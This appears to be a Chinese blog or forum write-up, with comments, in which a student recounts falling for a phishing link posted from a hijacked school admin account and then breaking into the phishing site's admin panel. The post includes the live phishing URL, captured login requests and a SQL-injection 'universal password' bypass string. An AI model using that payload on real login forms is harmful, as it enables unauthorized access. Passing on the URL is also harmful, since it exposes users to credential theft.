起因
学校群里管理员发布了一个文档,打开发现不对劲
粗心了,看着是管理员发的就点进去进行了登录操作,登录后才后知后觉里面是钓鱼链接
钓鱼网站
http://syydie.com.cdshe.xyz/mail/?user=facai
burp抓包钓鱼框登录过程
POST /gm/login_do.php HTTP/1.1
Host: xxxxx.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://syydie.com.cdshe.xyz/gm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Connection: close
Cookie: PHPSESSID=2jf2ovv41tp00niapop7lvhvg0
Upgrade-Insecure-Requests: 1
username=admin&password=admin&denglu.x=25&denglu.y=4
存在SQL注入
后台登录过程
后台地址 http://syydie.com.cdshe.xyz/gm/
POST /gm/login_do.php HTTP/1.1
Host: xxxx.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://syydie.com.cdshe.xyz/gm/
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Connection: close
Cookie: PHPSESSID=2jf2ovv41tp00niapop7lvhvg0
Upgrade-Insecure-Requests: 1
username=admin&password=admin&denglu.x=25&denglu.y=4`
万能密码
admin 'or' 1=1
- 结束语
钓鱼网站里共600+用户密码数据,盗号者盗取学校管理员QQ号后发布钓鱼链接,骗取学生信任点击钓鱼链接。
在点击链接时要注意观察地址栏是不是官方链接,渠道是不是官方渠道,点击钓鱼链接后要及时更改密码。
狠啊,deep

@小虚无 那必须
居然还在。
@瓶瓶罐罐 忘记打码了 -.-
@Deep 能提权吗。
大佬试试能提权吗。
@//../xian.gif 罐 后台设置很简单,没有获取到webshell,更无从提权,不过已经举报了该网站